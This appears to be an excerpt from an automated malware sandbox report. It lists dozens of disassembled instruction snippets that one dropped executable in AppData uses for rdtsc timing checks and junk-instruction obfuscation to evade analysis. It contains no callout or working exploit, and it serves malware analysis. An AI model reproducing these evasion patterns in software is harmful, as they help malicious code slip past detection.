Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C81E79 second address: C81ECF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F0E948C9FB6h 0x00000009 jg 00007F0E948C9FB6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov dword ptr [esp], eax 0x00000015 mov dx, 9ED0h 0x00000019 mov ebx, dword ptr [ebp+12496053h] 0x0000001f mov edx, 497EB8E2h 0x00000024 mov dword ptr [ebp+12470854h], ecx 0x0000002a add eax, ebx 0x0000002c push 00000000h 0x0000002e push ebx 0x0000002f call 00007F0E948C9FB8h 0x00000034 pop ebx 0x00000035 mov dword ptr [esp+04h], ebx 0x00000039 add dword ptr [esp+04h], 00000016h 0x00000041 inc ebx 0x00000042 push ebx 0x00000043 ret 0x00000044 pop ebx 0x00000045 ret 0x00000046 mov edx, 1A64E797h 0x0000004b nop 0x0000004c push eax 0x0000004d push edx 0x0000004e push edi 0x0000004f pushad 0x00000050 popad 0x00000051 pop edi 0x00000052 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CD53D5 second address: CD53E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F0E94F51A46h 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CD53E2 second address: CD5402 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F0E948C9FC2h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CD5402 second address: CD5406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CD5406 second address: CD5430 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0E948C9FB6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F0E948C9FC8h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CD9B17 second address: CD9B1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CD9B1C second address: CD9B27 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jng 00007F0E948C9FB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CD9C98 second address: CD9C9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CD9E00 second address: CD9E04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CD9E04 second address: CD9E0A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CD9E0A second address: CD9E52 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0E948C9FCCh 0x00000008 pushad 0x00000009 jmp 00007F0E948C9FC5h 0x0000000e push eax 0x0000000f pop eax 0x00000010 jne 00007F0E948C9FB6h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push ecx 0x0000001a jbe 00007F0E948C9FBCh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CDFB3B second address: CDFB3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CDFB3F second address: CDFB51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F0E948C9FBCh 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CDFB51 second address: CDFB6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F0E94F51A46h 0x00000009 jmp 00007F0E94F51A53h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CDFB6F second address: CDFB94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jbe 00007F0E948C9FBEh 0x0000000e jnc 00007F0E948C9FB8h 0x00000014 pushad 0x00000015 push eax 0x00000016 pop eax 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE0D51 second address: CE0D55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE0D55 second address: CE0D5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE0D5B second address: CE0D61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE6B39 second address: CE6B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE6B3F second address: CE6B45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE6B45 second address: CE6B4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE6B4C second address: CE6B5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE6B5F second address: CE6B63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE6B63 second address: CE6B6D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0E94F51A46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE9AAB second address: CE9AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE9AB3 second address: CE9AC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0E94F51A46h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE9AC2 second address: CE9AC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE9D63 second address: CE9D6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0E94F51A46h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE9D6F second address: CE9D7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE9D7A second address: CE9D7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE9EE1 second address: CE9EE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE9EE5 second address: CE9EE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE9EE9 second address: CE9EEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CEA456 second address: CEA45A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CEA5AF second address: CEA5D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FBAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0E948C9FC5h 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CF2548 second address: CF2558 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F0E94F51A46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CF2558 second address: CF2582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0E948C9FB6h 0x0000000a jmp 00007F0E948C9FC5h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jne 00007F0E948C9FB6h 0x0000001a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CF285C second address: CF2878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F0E94F51A51h 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CF2878 second address: CF287E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CF287E second address: CF2884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CF2884 second address: CF2888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CF29CE second address: CF29D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CF2B5E second address: CF2B6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0E948C9FB6h 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CF2CFF second address: CF2D03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CF1B7A second address: CF1B91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jmp 00007F0E948C9FBAh 0x0000000a push edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CF7748 second address: CF774C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CF774C second address: CF776A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F0E948C9FBAh 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F0E948C9FB6h 0x00000014 jl 00007F0E948C9FB6h 0x0000001a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CF776A second address: CF776E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CF776E second address: CF779D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jbe 00007F0E948C9FB6h 0x00000011 popad 0x00000012 push ebx 0x00000013 jmp 00007F0E948C9FC6h 0x00000018 pushad 0x00000019 popad 0x0000001a pop ebx 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CFC07C second address: CFC082 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D0F031 second address: D0F035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C3FEA8 second address: C3FEC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F0E94F51A46h 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C3FEC4 second address: C3FEC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C3FEC8 second address: C3FECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C3FECE second address: C3FEEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0E948C9FC5h 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D1AF72 second address: D1AF76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D1AF76 second address: D1AF7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D21CB9 second address: D21CC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D21CC8 second address: D21CCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D21CCE second address: D21D0A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0E94F51A6Fh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007F0E94F51A46h 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D21D0A second address: D21D14 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D21D14 second address: D21D38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A51h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jp 00007F0E94F51A46h 0x00000014 push eax 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D21D38 second address: D21D41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D21EB6 second address: D21EC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D21EC1 second address: D21EC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D21EC5 second address: D21EDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D21EDC second address: D21EE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D222FA second address: D2231F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A58h 0x00000007 ja 00007F0E94F51A46h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D2231F second address: D22327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D22327 second address: D2232C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D2232C second address: D22343 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F0E948C9FB6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jbe 00007F0E948C9FB6h 0x00000011 push eax 0x00000012 pop eax 0x00000013 popad 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D22677 second address: D2267C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D2267C second address: D22682 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D22682 second address: D2268C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0E94F51A46h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D22818 second address: D2284F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0E948C9FB6h 0x00000008 jmp 00007F0E948C9FC2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnc 00007F0E948C9FC2h 0x00000015 jmp 00007F0E948C9FBAh 0x0000001a push edi 0x0000001b pop edi 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D2284F second address: D22863 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jc 00007F0E94F51A46h 0x0000000d jg 00007F0E94F51A46h 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D26DF3 second address: D26E07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jg 00007F0E948C9FB6h 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F0E948C9FB6h 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C44F34 second address: C44F3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C44F3A second address: C44F48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F0E948C9FB6h 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C44F48 second address: C44F4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C44F4C second address: C44F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D26962 second address: D26970 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F0E94F51A48h 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D26970 second address: D26983 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnl 00007F0E948C9FB6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D26983 second address: D26989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D26989 second address: D2698E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D2698E second address: D26994 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D26B10 second address: D26B2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F0E948C9FC4h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D26B2D second address: D26B33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D26B33 second address: D26B37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D26B37 second address: D26B4F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0E94F51A46h 0x00000008 jbe 00007F0E94F51A46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jne 00007F0E94F51A46h 0x00000018 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D31F09 second address: D31F0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D31F0D second address: D31F11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D45E15 second address: D45E36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E948C9FC4h 0x00000009 pushad 0x0000000a popad 0x0000000b jp 00007F0E948C9FB6h 0x00000011 popad 0x00000012 rdtsc
